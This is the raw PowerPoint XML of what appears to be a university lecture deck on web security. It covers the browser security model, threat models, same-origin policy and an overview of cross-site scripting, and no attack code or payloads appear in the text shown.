          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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3225800" y="3240088"/>
            <a:ext cx="1022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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>request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4073525" y="3910013"/>
            <a:ext cx="735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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155144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Two Sides of Web Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="굴림" charset="0"/>
              <a:cs typeface="굴림" charset="0"/>
            </a:endParaRP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5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Executes JavaScript presented by websites the user visits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Runs at website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Banks, online merchants, blogs, Google Apps, many others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Written in PHP, ASP, JSP, Ruby, …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162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3E5F6551-22BA-324F-8757-ED79860EC9B5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6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0244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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Picture 2" descr="C:\Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 13 vul_disclos_web_ap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" y="1770063"/>
            <a:ext cx="5086350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3" descr="C:\Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 14 vulns disclosures_pi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1884363"/>
            <a:ext cx="3489325" cy="413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on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web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924800" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Browser security model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The browser as an OS and execution platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Basic http: headers, cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Browser UI and security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>indicators</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How users authenticate to web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Browser-server mechanisms for managing state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Web application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Application pitfalls and defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTPS: goals and pitfalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Network issues and browser protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>handling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web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Safely browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information (without user’s permission)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should have the same security properties we require for stand-alone applications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Other ideas?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32671</TotalTime>
  <Words>2024</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>405</Paragraphs>
  <Slides>40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Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>2_Blueprint</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Reported Web Vulnerabilities "In the Wild"</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Typical Web Application Design</vt:lpstr>
      <vt:lpstr>Browser and Network</vt:lpstr>
      <vt:lpstr>Two Sides of Web Applications</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Topics on Web security</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Malware attacker</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Pages can embed content from many sources</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Running Remote Code is Risky</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Browser Sandbox</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Browser security mechanism</vt:lpstr>
      <vt:lpstr>The SOP questions are</vt:lpstr>
      <vt:lpstr>XSS Attacks</vt:lpstr>
      <vt:lpstr>JavaScript Security Model</vt:lpstr>
      <vt:lpstr>Library Import</vt:lpstr>
      <vt:lpstr>Web Attacker</vt:lpstr>
      <vt:lpstr>XSS: Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>Other XSS Risks</vt:lpstr>
      <vt:lpstr>Where Malicious Scripts Lurk</vt:lpstr>
      <vt:lpstr>Preventing Cross-Site Scripting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and the Impossibility of Realizable Ideal Functionality</dc:title>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Vijay Ganesh</cp:lastModifiedBy>
  <cp:revision>6844</cp:revision>
  <cp:lastPrinted>2011-04-22T01:01:27Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-02-26T16:05:35Z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C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>